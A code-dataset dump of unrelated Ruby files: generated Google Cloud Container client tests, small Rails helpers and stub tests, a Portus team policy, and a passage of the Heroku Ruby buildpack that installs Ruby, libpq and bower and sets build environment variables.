grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
node_count = 42
name = "hello world"
set_node_pool_size_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_node_pool_size, name
assert_kind_of ::Google::Cloud::Container::V1::SetNodePoolSizeRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal 42, request["node_count"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_node_pool_size_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_node_pool_size({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_node_pool_size project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_node_pool_size ::Google::Cloud::Container::V1::SetNodePoolSizeRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_node_pool_size({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_node_pool_size ::Google::Cloud::Container::V1::SetNodePoolSizeRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_node_pool_size_client_stub.call_rpc_count
end
end
def test_set_network_policy
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
network_policy = {}
name = "hello world"
set_network_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_network_policy, name
assert_kind_of ::Google::Cloud::Container::V1::SetNetworkPolicyRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NetworkPolicy), request["network_policy"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_network_policy_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_network_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_network_policy project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_network_policy ::Google::Cloud::Container::V1::SetNetworkPolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_network_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_network_policy ::Google::Cloud::Container::V1::SetNetworkPolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_network_policy_client_stub.call_rpc_count
end
end
def test_set_maintenance_policy
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
maintenance_policy = {}
name = "hello world"
set_maintenance_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_maintenance_policy, name
assert_kind_of ::Google::Cloud::Container::V1::SetMaintenancePolicyRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::MaintenancePolicy), request["maintenance_policy"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_maintenance_policy_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_maintenance_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_maintenance_policy project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_maintenance_policy ::Google::Cloud::Container::V1::SetMaintenancePolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_maintenance_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_maintenance_policy ::Google::Cloud::Container::V1::SetMaintenancePolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_maintenance_policy_client_stub.call_rpc_count
end
end
def test_list_usable_subnetworks
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::ListUsableSubnetworksResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
filter = "hello world"
page_size = 42
page_token = "hello world"
list_usable_subnetworks_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_usable_subnetworks, name
assert_kind_of ::Google::Cloud::Container::V1::ListUsableSubnetworksRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["filter"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_usable_subnetworks_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_usable_subnetworks({ parent: parent, filter: filter, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_usable_subnetworks parent: parent, filter: filter, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_usable_subnetworks ::Google::Cloud::Container::V1::ListUsableSubnetworksRequest.new(parent: parent, filter: filter, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_usable_subnetworks({ parent: parent, filter: filter, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_usable_subnetworks ::Google::Cloud::Container::V1::ListUsableSubnetworksRequest.new(parent: parent, filter: filter, page_size: page_size, page_token: page_token), grpc_options do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_usable_subnetworks_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::Container::V1::ClusterManager::Client::Configuration, config
end
end
| 44.619179 | 388 | 0.722336 |
4af0431b68e58bc365ec728f87da6412c6ecf34e | 75 | require 'test_helper'
# Scaffolded test case for ContentsHelper. ActionView::TestCase mixes the
# helper's methods in directly; no helper behavior is exercised yet.
class ContentsHelperTest < ActionView::TestCase
end
| 15 | 47 | 0.826667 |
012468e127766e0847185840e9e68a28050922b7 | 139 | require 'test_helper'
# Scaffolded functional tests for UserContactsController. The generated
# sample below stays commented out until real assertions are added.
class UserContactsControllerTest < ActionController::TestCase
  # test "the truth" do
  #   assert true
  # end
end
| 17.375 | 61 | 0.741007 |
1179652d720b9e1076d2b3c5ecb7bb9165eabd91 | 636 | if defined?(Enumerator::Lazy)
covers 'facets/enumerator/lazy/squeeze'
test_case Enumerator::Lazy do
method :squeeze do
# make an Enumerable class to test
eC = Class.new do
include Enumerable
def initialize(*a)
@a = a
end
def each(&b)
@a.each(&b)
end
end
test 'example (default)' do
e = eC.new(1,2,2,3,3,2,1)
e.lazy.squeeze.to_a.assert == [1,2,3,2,1]
end
test 'example (with argument)' do
e = eC.new(1,2,2,3,3,2,1)
e.lazy.squeeze(*[3]).to_a.assert == [1,2,2,3,2,1]
end
end
end
end
| 18.705882 | 57 | 0.523585 |
8798de6e517a20fd085fb18eac82f80cf961cd20 | 597 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
package 'php8.0-xsl'
| 37.3125 | 74 | 0.758794 |
39b7d5bcca305aed929f8e5b88f19bdf1453a220 | 1,202 | # frozen_string_literal: true
module Script
  module Layers
    module Domain
      # Domain-layer error types raised while working with script projects.
      # All inherit from ScriptProjectError so callers can rescue broadly.
      module Errors
        # Raised when the push package for a script cannot be located.
        class PushPackageNotFoundError < ScriptProjectError; end

        # Raised when a script references an unknown extension point type.
        class InvalidExtensionPointError < ScriptProjectError
          attr_reader :type

          def initialize(type)
            super()
            @type = type
          end
        end

        # Raised when a required field is absent from the script config file.
        class MissingScriptConfigFieldError < ScriptProjectError
          attr_reader :field, :filename

          def initialize(field:, filename:)
            super()
            @field, @filename = field, filename
          end
        end

        # Raised when no script matches the given extension point and title.
        class ScriptNotFoundError < ScriptProjectError
          attr_reader :title, :extension_point_type

          def initialize(extension_point_type, title)
            super()
            @extension_point_type, @title = extension_point_type, title
          end
        end

        # Raised when a metadata file is missing.
        class MetadataNotFoundError < ScriptProjectError
          attr_reader :filename

          def initialize(filename)
            super()
            @filename = filename
          end
        end

        # Raised when a metadata file exists but fails validation.
        class MetadataValidationError < ScriptProjectError; end
      end
    end
  end
end
| 25.041667 | 64 | 0.591514 |
bb34b926a3e5055221905726812dd60e29d53630 | 623 | module EventHelper
def past_due(event)
if !event.follow_up_date.nil? && event.follow_up_date < Date.today
link_to "PAST DUE", event_path(event)
else
link_to event.name, event_path(event)
end
end
def li_id_past_due(event)
if !event.follow_up_date.nil? && event.follow_up_date < Date.today
"id=past-due"
end
end
def display_follow_up_date(event)
if !event.follow_up_date.nil?
presentable_date(event.follow_up_date)
else
"N/A"
end
end
def follow_up_display(event)
if event.follow_up == true
"Yes"
else
"No"
end
end
end
| 18.323529 | 70 | 0.654896 |
2606cb77f4c601c1a5a2d1c624e274a87e2cd206 | 545 | # Policy for team members. It does not authorize anything unless the author of
# the action is an owner. An owner is either an admin of Portus or an owner of
# the team itself.
class TeamUserPolicy
attr_reader :user, :team_user
def initialize(user, team_user)
raise Pundit::NotAuthorizedError, "must be logged in" unless user
@user = user
@team_user = team_user
end
def owner?
user.admin? || @team_user.team.owners.exists?(user.id)
end
alias destroy? owner?
alias update? owner?
alias create? owner?
end
| 24.772727 | 78 | 0.713761 |
79a1cf038c8fd4aa645f8730532d1895abaf87d4 | 41,288 | require "tmpdir"
require "digest/md5"
require "benchmark"
require "rubygems"
require "language_pack"
require "language_pack/base"
require "language_pack/ruby_version"
require "language_pack/helpers/nodebin"
require "language_pack/helpers/node_installer"
require "language_pack/helpers/yarn_installer"
require "language_pack/helpers/jvm_installer"
require "language_pack/version"
# base Ruby Language Pack. This is for any base ruby app.
class LanguagePack::Ruby < LanguagePack::Base
NAME = "ruby"
LIBYAML_VERSION = "0.1.7"
LIBYAML_PATH = "libyaml-#{LIBYAML_VERSION}"
RBX_BASE_URL = "http://binaries.rubini.us/heroku"
NODE_BP_PATH = "vendor/node/bin"
# detects if this is a valid Ruby app
# @return [Boolean] true if it's a Ruby app
def self.use?
instrument "ruby.use" do
File.exist?("Gemfile")
end
end
def self.bundler
@@bundler ||= LanguagePack::Helpers::BundlerWrapper.new.install
end
def bundler
self.class.bundler
end
def initialize(build_path, cache_path=nil)
super(build_path, cache_path)
@fetchers[:mri] = LanguagePack::Fetcher.new(VENDOR_URL, @stack)
@fetchers[:rbx] = LanguagePack::Fetcher.new(RBX_BASE_URL, @stack)
@node_installer = LanguagePack::Helpers::NodeInstaller.new
@yarn_installer = LanguagePack::Helpers::YarnInstaller.new
@jvm_installer = LanguagePack::Helpers::JvmInstaller.new(slug_vendor_jvm, @stack)
end
def name
"Ruby"
end
def default_addons
instrument "ruby.default_addons" do
add_dev_database_addon
end
end
def default_config_vars
instrument "ruby.default_config_vars" do
vars = {
"LANG" => env("LANG") || "en_US.UTF-8",
}
ruby_version.jruby? ? vars.merge({
"JAVA_OPTS" => default_java_opts,
"JRUBY_OPTS" => default_jruby_opts
}) : vars
end
end
def default_process_types
instrument "ruby.default_process_types" do
{
"rake" => "bundle exec rake",
"console" => "bundle exec irb"
}
end
end
def best_practice_warnings
if bundler.has_gem?("asset_sync")
warn(<<-WARNING)
You are using the `asset_sync` gem.
This is not recommended.
See https://devcenter.heroku.com/articles/please-do-not-use-asset-sync for more information.
WARNING
end
end
def compile
instrument 'ruby.compile' do
# check for new app at the beginning of the compile
new_app?
Dir.chdir(build_path)
remove_vendor_bundle
warn_bundler_upgrade
install_ruby
install_jvm
setup_language_pack_environment
setup_export
setup_profiled
allow_git do
vendor_libpq
install_bundler_in_app
build_bundler("development:test")
post_bundler
create_database_yml
install_binaries
install_bower
install_bower_defined_dependencies
run_assets_precompile_rake_task
end
config_detect
best_practice_warnings
warn_outdated_ruby
cleanup
super
end
rescue => e
warn_outdated_ruby
raise e
end
def vendor_libpq
# Check for existing libraries
return unless File.exist?("/usr/lib/x86_64-linux-gnu/libpq.so.5.11")
return unless ENV['STACK'] == 'heroku-18'
topic("Vendoring libpq 5.12.1")
@metadata.fetch("vendor_libpq12") do
warn(<<~EOF)
Replacing libpq with version libpq 5.12.1
This version includes a bug fix that can cause an exception
on boot for applications with incorrectly configured connection
values. For more information see:
https://devcenter.heroku.com/articles/libpq-5-12-1-breaking-connection-behavior
If your application breaks you can rollback to your last build.
You can also temporarially opt out of this behavior by setting:
```
$ heroku config:set HEROKU_SKIP_LIBPQ12=1
```
In the future libpq 5.12 will be the default on the platform and
you will not be able to opt-out of the library. For more information see:
https://devcenter.heroku.com/articles/libpq-5-12-1-breaking-connection-behavior
EOF
"true" # Set future cache value
end
Dir.chdir("vendor") do
@fetchers[:mri].fetch("libpq5_12.1-1.deb")
run!("dpkg -x libpq5_12.1-1.deb .")
run!("rm libpq5_12.1-1.deb")
load_libpq_12_unless_env_var = <<~EOF
if [ "$HEROKU_SKIP_LIBPQ12" == "" ]; then
export LD_LIBRARY_PATH="$HOME/vendor/usr/lib/x86_64-linux-gnu/:$LD_LIBRARY_PATH"
fi
EOF
add_to_export load_libpq_12_unless_env_var
add_to_profiled load_libpq_12_unless_env_var
ENV["LD_LIBRARY_PATH"] = Dir.pwd + "/usr/lib/x86_64-linux-gnu:#{ENV["LD_LIBRARY_PATH"]}"
end
end
def cleanup
end
def config_detect
end
def install_bower
topic 'Installing bower'
pipe('npm install -g [email protected]')
unless $?.success?
error "Can't install Bower 1.8.8"
end
end
def install_bower_defined_dependencies
topic 'Installing dependencies via bower'
pipe('bundle exec bowndler bower_configure')
pipe('.heroku/node/bin/bower install --config.storage.packages=vendor/bower/packages --config.storage.registry=vendor/bower/registry --config.tmp=vendor/bower/tmp 2>&1')
FileUtils.rm_rf("vendor/bower/tmp")
end
private
def default_malloc_arena_max?
return true if @metadata.exists?("default_malloc_arena_max")
return @metadata.touch("default_malloc_arena_max") if new_app?
return false
end
def stack_not_14_not_16?
case stack
when "cedar-14", "heroku-16"
return false
else
return true
end
end
def warn_bundler_upgrade
old_bundler_version = @metadata.read("bundler_version").chomp if @metadata.exists?("bundler_version")
if old_bundler_version && old_bundler_version != bundler.version
warn(<<-WARNING, inline: true)
Your app was upgraded to bundler #{ bundler.version }.
Previously you had a successful deploy with bundler #{ old_bundler_version }.
If you see problems related to the bundler version please refer to:
https://devcenter.heroku.com/articles/bundler-version#known-upgrade-issues
WARNING
end
end
# the base PATH environment variable to be used
# @return [String] the resulting PATH
def default_path
# need to remove bin/ folder since it links
# to the wrong --prefix ruby binstubs
# breaking require. This only applies to Ruby 1.9.2 and 1.8.7.
safe_binstubs = binstubs_relative_paths - ["bin"]
paths = [
ENV["PATH"],
"bin",
system_paths,
]
paths.unshift("#{slug_vendor_jvm}/bin") if ruby_version.jruby?
paths.unshift(safe_binstubs)
paths.join(":")
end
def binstubs_relative_paths
[
"bin",
bundler_binstubs_path,
"#{slug_vendor_base}/bin"
]
end
# system-level bin directories appended at the end of the build PATH
# @return [String] colon separated list of directories
def system_paths
  %w[/usr/local/bin /usr/bin /bin].join(":")
end
# computes the relative vendor/bundle gem path for the app's ruby by
# shelling out so the result matches its RUBY_ENGINE and ABI version
# @return [String] e.g. "vendor/bundle/ruby/2.6.0"
def self.slug_vendor_base
  command = %q(ruby -e "require 'rbconfig';puts \"vendor/bundle/#{RUBY_ENGINE}/#{RbConfig::CONFIG['ruby_version']}\"")
  slug_vendor_base = run_no_pipe(command, user_env: true).chomp
  # interpolate the local variable, not @slug_vendor_base: in this
  # class-method context the instance variable is always nil, which
  # produced an empty/uninformative error message
  error "Problem detecting bundler vendor directory: #{slug_vendor_base}" unless $?.success?
  return slug_vendor_base
end
# the relative path to the bundler directory of gems
# memoized; delegates to the class method which shells out to ruby
# @return [String] resulting path
def slug_vendor_base
instrument 'ruby.slug_vendor_base' do
@slug_vendor_base ||= self.class.slug_vendor_base
end
end
# the relative path to the vendored ruby directory
# @return [String] resulting path
def slug_vendor_ruby
"vendor/#{ruby_version.version_without_patchlevel}"
end
# the relative path to the vendored jvm (used by JRuby apps)
# @return [String] resulting path
def slug_vendor_jvm
"vendor/jvm"
end
# the absolute path of the build ruby to use during the buildpack
# @return [String] resulting path
def build_ruby_path
"/tmp/#{ruby_version.version_without_patchlevel}"
end
# fetch the ruby version from bundler
# memoized; also feeds the previously-deployed version from metadata so
# version-change handling can compare old vs. new
# @return [String, nil] returns the ruby version if detected or nil if none is detected
def ruby_version
instrument 'ruby.ruby_version' do
return @ruby_version if @ruby_version
new_app = !File.exist?("vendor/heroku")
last_version_file = "buildpack_ruby_version"
last_version = nil
last_version = @metadata.read(last_version_file).chomp if @metadata.exists?(last_version_file)
@ruby_version = LanguagePack::RubyVersion.new(bundler.ruby_version,
is_new: new_app,
last_version: last_version)
return @ruby_version
end
end
# default JAVA_OPTS
# return [String] string of JAVA_OPTS
def default_java_opts
"-Dfile.encoding=UTF-8"
end
# shell snippet (for profile.d/export) that picks JVM heap flags based on
# the dyno's `ulimit -u`, which correlates with the dyno size's memory limit
# @return [String] shell case statement echoing the heap options
def set_jvm_max_heap
<<-EOF
limit=$(ulimit -u)
case $limit in
512) # 2X, private-s: memory.limit_in_bytes=1073741824
echo "$opts -Xmx671m -XX:CICompilerCount=2"
;;
16384) # perf-m, private-m: memory.limit_in_bytes=2684354560
echo "$opts -Xmx2g"
;;
32768) # perf-l, private-l: memory.limit_in_bytes=15032385536
echo "$opts -Xmx12g"
;;
*) # Free, Hobby, 1X: memory.limit_in_bytes=536870912
echo "$opts -Xmx300m -Xss512k -XX:CICompilerCount=2"
;;
esac
EOF
end
# shell snippet that sets JAVA_MEM from JVM_MAX_HEAP unless the user
# already provided an -Xmx in JAVA_OPTS
# @return [String]
def set_java_mem
<<-EOF
if ! [[ "${JAVA_OPTS}" == *-Xmx* ]]; then
export JAVA_MEM=${JAVA_MEM:--Xmx${JVM_MAX_HEAP:-384}m}
fi
EOF
end
# shell snippet that derives sensible WEB_CONCURRENCY / HEROKU_RAM_LIMIT_MB
# defaults from the dyno size (detected via `ulimit -u`); user-set values win
# @return [String]
def set_default_web_concurrency
<<-EOF
case $(ulimit -u) in
256)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-512}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-2}
;;
512)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-1024}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-4}
;;
16384)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-2560}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-8}
;;
32768)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-6144}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-16}
;;
*)
;;
esac
EOF
end
# default JRUBY_OPTS
# return [String] string of JRUBY_OPTS
def default_jruby_opts
"-Xcompile.invokedynamic=false"
end
# default Java Xmx (shell expression, expanded at dyno boot)
# return [String] string of Java Xmx
def default_java_mem
"-Xmx${JVM_MAX_HEAP:-384}m"
end
# sets up the environment variables for the build process
# NOTE: ordering is significant — PATH entries are appended/overwritten in
# sequence and the final ENV["PATH"] = default_path must come last
def setup_language_pack_environment
instrument 'ruby.setup_language_pack_environment' do
if ruby_version.jruby?
ENV["PATH"] += ":bin"
# compute JAVA_MEM by running the heap-detection snippet in a shell
ENV["JAVA_MEM"] = run(<<-SHELL).chomp
#{set_jvm_max_heap}
echo #{default_java_mem}
SHELL
ENV["JRUBY_OPTS"] = env('JRUBY_BUILD_OPTS') || env('JRUBY_OPTS')
ENV["JAVA_HOME"] = @jvm_installer.java_home
end
setup_ruby_install_env
ENV["PATH"] += ":#{node_preinstall_bin_path}" if node_js_installed?
ENV["PATH"] += ":#{yarn_preinstall_bin_path}" if !yarn_not_preinstalled?
# By default Node can address 1.5GB of memory, a limitation it inherits from
# the underlying v8 engine. This can occasionally cause issues during frontend
# builds where memory use can exceed this threshold.
#
# This passes an argument to all Node processes during the build, so that they
# can take advantage of all available memory on the build dynos.
ENV["NODE_OPTIONS"] ||= "--max_old_space_size=2560"
# TODO when buildpack-env-args rolls out, we can get rid of
# ||= and the manual setting below
default_config_vars.each do |key, value|
ENV[key] ||= value
end
ENV["GEM_PATH"] = slug_vendor_base
ENV["GEM_HOME"] = slug_vendor_base
ENV["PATH"] = default_path
end
end
# Sets up the environment variables for subsequent processes run by
# muiltibuildpack. We can't use profile.d because $HOME isn't set up
# relative PATH entries are rewritten to be absolute under build_path
def setup_export
instrument 'ruby.setup_export' do
paths = ENV["PATH"].split(":")
set_export_override "GEM_PATH", "#{build_path}/#{slug_vendor_base}:$GEM_PATH"
set_export_default "LANG", "en_US.UTF-8"
set_export_override "PATH", paths.map { |path| /^\/.*/ !~ path ? "#{build_path}/#{path}" : path }.join(":")
if ruby_version.jruby?
add_to_export set_jvm_max_heap
add_to_export set_java_mem
set_export_default "JAVA_OPTS", default_java_opts
set_export_default "JRUBY_OPTS", default_jruby_opts
end
end
end
# sets up the profile.d script for this buildpack
# builds the runtime PATH from binstub dirs (and yarn when vendored) and
# writes runtime env defaults/overrides for the dyno
def setup_profiled
instrument 'setup_profiled' do
profiled_path = [binstubs_relative_paths.map {|path| "$HOME/#{path}" }.join(":")]
profiled_path << "vendor/#{@yarn_installer.binary_path}" if has_yarn_binary?
profiled_path << "$PATH"
set_env_default "LANG", "en_US.UTF-8"
set_env_override "GEM_PATH", "$HOME/#{slug_vendor_base}:$GEM_PATH"
set_env_override "PATH", profiled_path.join(":")
set_env_default "MALLOC_ARENA_MAX", "2" if default_malloc_arena_max?
add_to_profiled set_default_web_concurrency if env("SENSIBLE_DEFAULTS")
if ruby_version.jruby?
add_to_profiled set_jvm_max_heap
add_to_profiled set_java_mem
set_env_default "JAVA_OPTS", default_java_opts
set_env_default "JRUBY_OPTS", default_jruby_opts
end
end
end
# emits minor-version and EOL warnings once per build; joins the
# background version-check thread started in install_ruby first
def warn_outdated_ruby
return unless defined?(@outdated_version_check)
# memoize with ||= begin...end so the warnings only print once
@warn_outdated ||= begin
@outdated_version_check.join
warn_outdated_minor
warn_outdated_eol
true
end
end
# warns when the app's ruby has reached (or is about to reach) End of Life.
# picks the hard-EOL wording when eol? is true, otherwise the softer
# "potential EOL" wording
def warn_outdated_eol
  return unless @outdated_version_check.maybe_eol?

  if @outdated_version_check.eol?
    # fixed typo in the user-facing message: "eligable" -> "eligible"
    warn(<<~WARNING)
EOL Ruby Version
You are using a Ruby version that has reached its End of Life (EOL)
We strongly suggest you upgrade to Ruby #{@outdated_version_check.suggest_ruby_eol_version} or later
Your current Ruby version no longer receives security updates from
Ruby Core and may have serious vulnerabilities. While you will continue
to be able to deploy on Heroku with this Ruby version you must upgrade
to a non-EOL version to be eligible to receive support.
Upgrade your Ruby version as soon as possible.
For a list of supported Ruby versions see:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
WARNING
  else
    # Maybe EOL
    warn(<<~WARNING)
Potential EOL Ruby Version
You are using a Ruby version that has either reached its End of Life (EOL)
or will reach its End of Life on December 25th of this year.
We suggest you upgrade to Ruby #{@outdated_version_check.suggest_ruby_eol_version} or later
Once a Ruby version becomes EOL, it will no longer receive
security updates from Ruby core and may have serious vulnerabilities.
Please upgrade your Ruby version.
For a list of supported Ruby versions see:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
WARNING
  end
end
# warns when a newer patch release exists within the app's minor series
def warn_outdated_minor
return if @outdated_version_check.latest_minor_version?
warn(<<~WARNING)
There is a more recent Ruby version available for you to use:
#{@outdated_version_check.suggested_ruby_minor_version}
The latest version will include security and bug fixes, we always recommend
running the latest version of your minor release.
Please upgrade your Ruby version.
For all available Ruby versions see:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
WARNING
end
# install the vendored ruby
# downloads and unpacks the requested ruby (and a build ruby when needed),
# kicks off the outdated-version check, records the installed version in
# metadata, and warns when the Gemfile does not pin a ruby version.
# on fetch failure, builds a detailed error message (with stack-specific
# hints for heroku-18 and CI) and aborts the build.
# @return [Boolean] true if it installs the vendored ruby and false otherwise
def install_ruby
instrument 'ruby.install_ruby' do
return false unless ruby_version
installer = LanguagePack::Installers::RubyInstaller.installer(ruby_version).new(@stack)
if ruby_version.build?
installer.fetch_unpack(ruby_version, build_ruby_path, true)
end
installer.install(ruby_version, slug_vendor_ruby)
@outdated_version_check = LanguagePack::Helpers::OutdatedRubyVersion.new(
current_ruby_version: ruby_version,
fetcher: installer.fetcher
)
@outdated_version_check.call
@metadata.write("buildpack_ruby_version", ruby_version.version_for_download)
topic "Using Ruby version: #{ruby_version.version_for_download}"
if !ruby_version.set
warn(<<-WARNING)
You have not declared a Ruby version in your Gemfile.
To set your Ruby version add this line to your Gemfile:
#{ruby_version.to_gemfile}
# See https://devcenter.heroku.com/articles/ruby-versions for more information.
WARNING
end
end
true
rescue LanguagePack::Fetcher::FetchError => error
# ruby 2.2/2.3 binaries were never built for heroku-18; give a targeted hint
if stack == "heroku-18" && ruby_version.version_for_download.match?(/ruby-2\.(2|3)/)
message = <<ERROR
An error occurred while installing #{ruby_version.version_for_download}
This version of Ruby is not available on Heroku-18. The minimum supported version
of Ruby on the Heroku-18 stack can found at:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
ERROR
ci_message = <<ERROR
If you did not intend to build your app for CI on the Heroku-18 stack
please set your stack version manually in the `app.json`:
```
"stack": "heroku-16"
```
More information about this change in behavior can be found at:
https://help.heroku.com/3Y1HEXGJ/why-doesn-t-ruby-2-3-7-work-in-my-ci-tests
ERROR
if env("CI")
mcount "fail.bad_version_fetch.heroku-18.ci"
message << ci_message
else
mcount "fail.bad_version_fetch.heroku-18"
